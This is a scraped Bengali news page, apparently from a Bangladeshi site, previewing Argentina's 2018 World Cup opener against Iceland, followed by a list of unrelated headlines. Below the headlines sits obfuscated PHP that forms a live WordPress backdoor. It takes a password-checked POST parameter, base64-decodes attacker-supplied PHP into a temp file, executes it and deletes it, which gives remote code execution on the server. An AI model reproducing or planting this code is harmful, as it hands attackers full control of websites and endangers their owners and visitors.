বুধবার, ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

জয় দিয়ে বিশ্বকাপ মিশন শুরু করতে মুখিয়ে মেসিরা

news-image

স্পোর্টস ডেস্ক : রাশিয়া ফুটবল বিশ্বকাপের অন্যতম ফেভারিট দল আর্জেন্টিনা। আজ শনিবার এই বিশ্বকাপের মিশন শুরু করবে দুইবারের চ্যাম্পিয়নরা। দলকে তৃতীয়বারের মত শিরোপার স্বাদ পাইয়ে দিতে দলটির নজর এখন লিওনেল মেসির দিকে। ‘দ্য গ্রেটেস্ট শো অন আর্থ’ এ বর্তমান বিশ্বের অন্যতম সেরা এই তারকা ফুটবলারের চমক দেখতে মুখিয়ে আছেন তার ভক্তরাও।

আজ ‘ডি’ গ্রুপে আর্জেন্টিনার প্রতিপক্ষ আইসল্যান্ড। জয় দিয়ে বিশ্বকাপ মিশন শুরু করতে চায় আর্জেন্টিনা। প্রথমবারের মতো বিশ্বকাপে সুযোগ পাওয়া আইসল্যান্ড চায়, ভালো কিছু করে দেখাতে।

বাংলাদেশ সময় শনিবার সন্ধ্যা ৭টায় শুরু হবে আর্জেন্টিনা ও আইসল্যান্ডের লড়াই।

অনেকটা ভাগ্যের জোড়েই বিশ্বকাপে জায়গা করে নেয় আর্জেন্টিনা। বাছাই পর্বে ১৮ ম্যাচে ৭ জয়, ৭ ড্র ও ৪ হারে ২৮ পয়েন্ট নিয়ে ল্যাটিন আমেরিকা অঞ্চলে তৃতীয়স্থান পেয়ে রাশিয়া বিশ্বকাপের টিকিট কাটে হর্হে সাম্পাওলির শিষ্যরা। তবে সেসব এখন অতীত।

আর্জেন্টিনার কোচ সাম্পাওলি বলেন, অতীত এখন আমাদের সঙ্গে নেই। আমরা ভবিষ্যত নিয়েই চিন্তা করছি। দল হিসেবে আমরা এখন অনেক বেশি গোছানো। আশা করি আমাদের সামনের দিনগুলো ভালো কাটবে।

বিশ্বকাপ শুরুর তিনদিন আগেই রাশিয়ায় পৌঁছায় আর্জেন্টিনা। ইতিমধ্যে সেখানকার কন্ডিশনের সঙ্গে মানিয়ে নিয়েছে মেসি-ডি মারিয়া-আগুয়েরোরা। আইসল্যান্ডের বিপক্ষে খেলার জন্য প্রস্তুত তারা।

গত আসরে গ্রুপ পর্বের তিন ম্যাচে শতভাগ সাফল্য নিয়ে শেষ ষোলোতে উঠে আর্জেন্টিনা। এরপর সেখান থেকে টানা তিন জয়ে ফাইনালেও জায়গা করে নেয় আর্জেন্টিনা।

তৃতীয়বারের মতো বিশ্ব চ্যাম্পিয়নের খেতাব জিততে ফাইনালে জার্মানির মুখোমুখি হয় মেসির দল। কিন্তু পুরো ফাইনাল ম্যাচে ভালো খেলেও অতিরিক্ত সময়ের শেষ দিকে এক গোল হজম করে বিশ্বকাপে শ্রেষ্ঠত্বের মুকুট পড়তে পারেনি আর্জেন্টিনা। তাই রানার-আপের তকমা গায়ে এটে ২১তম বিশ্বকাপে যাত্রা শুরু করতে যাচ্ছে আর্জেন্টিনা।

চলতি বছর বিশ্বকাপের প্রীতি ম্যাচের আগে গেল মার্চে দুটি খেলায় অংশ নেয় আর্জেন্টিনা। এবারের আসরে বিশ্বকাপ বাছাই পর্ব টপকাতে না পারা ইতালির বিপক্ষে ২-০ বিপক্ষে জয় পায় সাদা-নীল জার্সিধারিরা। তবে পরের ম্যাচে স্পেনের কাছে ৬-১ গোলের হারের লজ্জা পায় আর্জেন্টিনা।

বিশ্বকাপের বাছাই পর্বে গ্রুপ ‘আই’ থেকে ১০ খেলায় ২২ পয়েন্ট নিয়ে মূল পর্বে খেলার যোগ্যতা অর্জন করে আইসল্যান্ড। এই প্রথমবারের মত বিশ্বকাপের মত বড় মঞ্চে খেলার সুযোগ পেল তারা। তাই প্রথমবারের মত পাওয়া সুযোগটা স্মরণীয় করে রাখতে মুখিয়ে আছে আইসল্যান্ড।

এ জাতীয় আরও খবর

মুক্তিযোদ্ধার ভুয়া সনদ : ভাতা সুদে-আসলে ফেরত নেবে সরকার

তানজিমকে শাস্তি দিয়েছে আইসিসি

সুনামগঞ্জে বন্যা পরিস্থিতির আরও অবনতির শঙ্কা

পিয়ংইয়ং পৌঁছেছেন রুশ প্রেসিডেন্ট পুতিন

নতুন সময়সূচি চালু : আজ থেকে ব‌্যাংক লেনদেন ১০-৪টা, অফিস চলবে ৬টা পর্যন্ত

তীব্র তাপপ্রবাহের মধ্যে এ বছর ৫৫০ হজযাত্রীর মৃত্যু

ব্রাহ্মণবাড়িয়ায় তিনহাজার টাকা পাওনা নিয়ে হাতাহাতি, বৃদ্ধের মৃত্যু

বছরের সবচেয়ে দামি নায়িকা দীপিকা

বুবলির নাম মুখে নিতে ‘ঘেন্না’ লাগে অপুর

তুফান সিনেমা দেখতে গিয়ে হল ভাঙচুর করলো দর্শকেরা

পতন ঘটতে পারে সরকারের, মোদির জোটের লোকজন যোগাযোগ করছেন : রাহুল

জীবিকার তাগিদ ঘরে ফিরতে দেয়নি তাদের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}